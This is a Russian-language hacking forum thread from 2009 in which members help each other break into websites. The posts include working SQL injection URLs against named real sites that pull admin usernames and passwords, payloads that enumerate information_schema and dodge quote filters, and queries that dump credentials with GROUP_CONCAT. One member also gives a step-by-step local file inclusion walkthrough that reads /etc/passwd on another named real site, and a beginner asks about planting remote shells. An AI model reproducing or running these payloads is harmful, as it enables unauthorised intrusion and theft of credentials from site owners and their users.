Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Мы по твоему кто? Экстрасенсы? Мы не можем знать, делал ты так или нет. Если бы кинул ссылку - все было бы гораздо проще.

    А то знаешь, как бывает... Помогаешь человеку сделать вывод таблиц из information_schema, и после долгих дискуссий он тебе кидает в личку ссылку, смотришь version()...

    ЗЫ: Кинь ссылку в личку.
     
    #4761 R1dex, 20 Jan 2009
    Last edited: 20 Jan 2009
  2. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    если есть вывод or 1=@@version, возможно )--+, как уже сказали выше без ссылки можно долго прыгать вокруг скули с бубном
    /add попробуй
    (select+top+1+column_name+from+information _schema.columns+where+table_name='t')
     
    #4762 l1ght, 20 Jan 2009
    Last edited: 2 Mar 2009
  3. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    выводит когда просто
    site.com/chk/chk.asp?ID=@@version
     
  4. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    хорошо, тогда такой вапрос, как добавить юзера через скуль?
    mssql - юзер sa

    А то я все перевробывал

     
  5. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    разве mssql принимает значения в хексе, начинающиеся с 0x? От фильтрации кавычек помогает char(), но никак не хекс как для MySQL. Сомневаюсь, что дело именно в кавычках, но стоит попробовать так:
    (select+top+1+column_name+from+information _schema.columns+where+table_name=CHAR(116)%2BCHAR(98)%2BCHAR(108)%2BCHAR(65)%2BCHAR(99)%2BCHAR(99)%2BCHAR(111)%2BCHAR(117)%2BCHAR(110)%2BCHAR(116)%2BCHAR(115))
    Кстати в mssql пробел после -- не нужен
     
    1 person likes this.
  6. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    челы нужно phppgadmin как r57mysql одним php файлом

    и еще вот скуля )
     
    #4766 sabe, 21 Jan 2009
    Last edited: 21 Jan 2009
    1 person likes this.
  7. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Подскажите, можно ли такое сделать.

    Вывожу инфу:

    group_concat(name,0x3a,pass,0x3a,city)
    Выплывает это все одной большой партянкой и все слитно, то есть все записи в одной строке через двоеточие, пример:

    admin:admin:belmor:root:root:belmor - ну и так далее!

    вопрос:

    Можно ли вывести информацию, что бы каждая записи выводилась с новой строки:

    admin:admin:belmor
    root:root:belmor

    Thx.
     
  8. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Это Microsoft Access.

    Code:
    http://www.contecmed.com/cart/product_show.asp?id=38+and+1=1+union+select+1,2,3,4,5,6,7,8,9,0,11,12+from+news
    Хм.. ну попробуй group_concat(name,0x3a,pass,0x3a,city,0x0a)

    Не всегда работает..
     
    #4768 R1dex, 21 Jan 2009
    Last edited: 21 Jan 2009
  9. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    R1dex, да, что-то не хочет.
     
  10. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Code:
    http://www.contecmed.com/cart/product_show.asp?id=-37+or+1=1+union+select+1,2,3,4,5,6,7,pass,9,user,11,12+from+admin
    ;)
     
    1 person likes this.
  11. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    не обратил внимания (скопировал запрос выше), имелось (предполагалась) ввиду не фильтровация ковычек, а в пропавшая после -- ' <=> near ''' & near 'accid', суть была в том что бы закрыть предыдущее условие/подзапрос; ступил, т.к. можно было его и не закрывать-- (работать с этим условием)
    насчет пробела, маслом кашу не испортишь, привычка с mysql ;)
     
  12. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    SELECT GROUP_CONCAT(CONCAT(name,0x3a,pass,0x3a,city) SEPARATOR 0×0a) FROM users
    SELECT GROUP_CONCAT(CONCAT(name,0x3a,pass,0x3a,city) SEPARATOR 0x3C62723E) FROM users
     
    1 person likes this.
  13. gangs

    gangs New Member

    Joined:
    30 Jun 2008
    Messages:
    14
    Likes Received:
    3
    Reputations:
    -3
    привет всем! хочу спросить по поводу php inj, прочитал много статей так и не могу реально взломать сайт..не подскажите как(что нужно) и с чего начать?
     
  14. gangs

    gangs New Member

    Joined:
    30 Jun 2008
    Messages:
    14
    Likes Received:
    3
    Reputations:
    -3
    ну давай возмём на сайте любую уязвимость...и раскрутим??
     
  15. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Любую? Так зайди в раздел sql инъекции, вот тебе и раскрученная инъекция.
    Аналогично с PHP inj.
     
  16. gangs

    gangs New Member

    Joined:
    30 Jun 2008
    Messages:
    14
    Likes Received:
    3
    Reputations:
    -3
    с sql инъекциями я разобрался....и зачем мне брать уже ломаные меня интересует...самому взломать, но я не могу не получается! вот и прошу чтоб кто нить реально помог раскрутить!
    взять любую php inj и раскрутить заново)
     
  17. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Так в чем проблема-то? Если ты читал статьи?

    Берём сайт.

    Code:
    http://vitzrotech.com
    Находим "интересную" ссылку

    Code:
    http://vitzrotech.com/english/ourproducts/mcb/link.php?file=mcb2.htm
    Пробуем:

    Code:
    http://vitzrotech.com/english/ourproducts/mcb/link.php?file=blablabla
    Читаем /etc/passwd

    Code:
    http://vitzrotech.com/english/ourproducts/mcb/link.php?file=../../../../../../../../etc/passwd
     
    #4777 R1dex, 21 Jan 2009
    Last edited: 21 Jan 2009
  18. gangs

    gangs New Member

    Joined:
    30 Jun 2008
    Messages:
    14
    Likes Received:
    3
    Reputations:
    -3
    за это спасибо..но есть еще два вопроса....скоко надо поставить ../../../../../../../../../../ после file= , и видел по видео подставляют свои ссылки нс шеллом...что нить в этом роде не мог ли бы показать??
     
  19. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    чем больше тем лутчше, шучу :) ., /../ - подняться на 1-у дирикторию верх, смотришь скока у тебя от твоего местоположения до требуемой диры ну и ставишь необходимое количество.
     
    1 person likes this.
  20. gangs

    gangs New Member

    Joined:
    30 Jun 2008
    Messages:
    14
    Likes Received:
    3
    Reputations:
    -3
    спс и за это..понял!! а как на счет этого-- видел по видео подставляют свои ссылки нс шеллом...что нить в этом роде не мог ли бы показать??
     
Thread Status:
Not open for further replies.